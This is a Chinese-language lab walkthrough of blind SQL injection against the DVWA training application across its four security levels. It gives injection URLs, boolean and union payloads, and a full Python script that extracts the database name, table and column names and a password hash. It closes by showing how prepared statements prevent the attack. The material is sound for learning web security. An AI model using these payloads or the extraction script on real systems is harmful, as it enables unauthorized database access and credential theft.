1.初级篇 Low.php

加单引号提交

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'&Submit=Submit#

输出用户id没有找到,加注释符正常,说明是单引号闭合

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'%23&Submit=Submit#

构造如下注入,若database名第一个字符为'd',即ascii码为100,页面正常

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=100%23&Submit=Submit#

反之页面不正常

http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=99%23&Submit=Submit#

有一点需要注意,语句执行失败会直接返回 404 Not Found,所以猜解失败的时候会触发urllib2.HTTPError

编写一个python脚本很容易完成猜解工作

# -- coding: utf-8 --

# version: python 2.7

# file: sql-blind-injection.py

# time: 2018.2.4

# author: superkrissV  

import urllib

import urllib2

# 必须携带正确的Cookie

headers={

        'Host': 'localhost',

        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',

        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

        'Accept-Encoding': 'gzip, deflate',

        'Cookie': 'security=low; PHPSESSID=h8uq0bha6sphm17mik8kml9hd3',

        }

target_url = "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?Submit=Submit&id=1"

success_str = "User ID exists in the database."

length_payload = "' and length(%s)>=%d #"

char_payload = "' and ascii(substr(%s, %d, 1))>=%d #"

table_name = "(select table_name from information_schema.tables where table_schema='%s' limit %d,1)"

column_name = "(select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1)"

column_data = "(select %s from %s.%s limit %d, 1)"

ascii_start = 33

ascii_end = 126

max_length = 50

# 构造对应的payload并发送

def sendRequest(payload):

    url = target_url + urllib.quote(payload)

#    print url

    try:

        request = urllib2.Request(url=url, headers=headers)

        response = urllib2.urlopen(request)

        if success_str in response.read():

            return True

        return False

    except urllib2.HTTPError as e:

        return False

# 利用递归和二分法获取长度

def getLength(start, end, command):

    if (start+1) == end:return start

    mid = (end+start) / 2

    if sendRequest(length_payload % (command, mid)):

        start = mid

    else:

        end = mid

#    print start,"    ",end

    result = getLength(start, end, command)

    return result

# 返回pos位置的字符的ascii码值

def getSingleChar(start, end, command, pos):

    if (start+1) == end:return start

    mid = (end+start) / 2

    if sendRequest(char_payload % (command, pos, mid)):

        start = mid

    else:

        end = mid

#    print start,"    ",end

    result = getSingleChar(start, end, command, pos)

    return result

def getInfo(command):

    pos = 1

    info = ""

    maxLen = getLength(1, max_length, command)

    print command, " length:", maxLen

    while(1):

        if pos > maxLen:break

        info += chr(getSingleChar(ascii_start, ascii_end, command, pos))

        pos += 1

        print info

getInfo("user()") # 14 root@localhost

getInfo("database()") # 4 dvwa

getInfo(table_name % ("dvwa",1)) # 5 users

getInfo(column_name % ("dvwa","users",1)) # 10 first_name

getInfo(column_name % ("dvwa","users",4)) # 8 password

getInfo(column_data % ("password", "dvwa", "users", 0)) # 32 5f4dcc3b5aa765d61d8327deb882cf99

2.中级篇 Medium.php

POST 提交

id=0 union select 1,2#&Submit=Submit

仍然显示存在,事实上id=0并不存在,但union select 返回了结果,程序只是单纯的判断结果集是否为空

和初级篇一样,猜字符

id=1 and ascii(substr(database(),1,1))=100#&Submit=Submit

3.高级篇 High.php

和上一章不同,这次是写入了cookie

http://localhost/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php

刷新

http://localhost/DVWA-master/vulnerabilities/sqli_blind/

使用EditThisCookie查看cookie

可以直接在这个页面直接注入

0' union select 1,2#

刷新页面

4.不可能篇 Impossible.php

查看源码就知道使用PDO,无法注入

    if(is_numeric( $id )) {

        // Check the database

        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );

        $data->bindParam( ':id', $id, PDO::PARAM_INT );

        $data->execute();

最新文章

  1. mvc 重定向的几种方式
  2. java1234教程系列笔记 S1 Java SE 0101 HelloWorld
  3. C#GridViewExport帮助类,美化导出
  4. easyui combotree 默认 初始化时就选中
  5. JavaScript的条件语句
  6. jmeter 建立一个扩展LDAP测试计划
  7. Windows 错误代码
  8. C#判断奇偶数的函數
  9. Redis failover过程
  10. Mater Nginx(2) - A Configuration Guide
  11. 大型网站应用中MySQL的架构演变史
  12. 你需要知道的10位Java开发牛人
  13. bzoj 1014: [JSOI2008]火星人prefix hash && splay
  14. javascript 闭包的理解
  15. 在WPF中自定义你的绘制(四)
  16. opencv分水岭算法对图像进行切割
  17. mybatis从数据库中取到的date格式不是yyyy-MM-dd HH:mm:ss
  18. 教你用.Net来玩微信跳一跳
  19. 设计模式之中介者模式(Mediator )
  20. ANDROID 中设计模式的采用--结构型模式

热门文章

  1. ZOJ问题(2010浙江大学研究生复试上机题目[找规律] hdoj 3788)
  2. Java学习笔记----容器
  3. TensorFlow的安装与CNN测试
  4. Hibernate连接数据库
  5. YTU 2542: 弟弟的作业
  6. 使用Google Closure Compiler全力压缩代码(转)
  7. 删除Oracle文件、注册表
  8. 【145】◀▶ .NET Framework类库索引
  9. E20170610-hm
  10. Django day 38 结算中心,支付中心,计算价格方法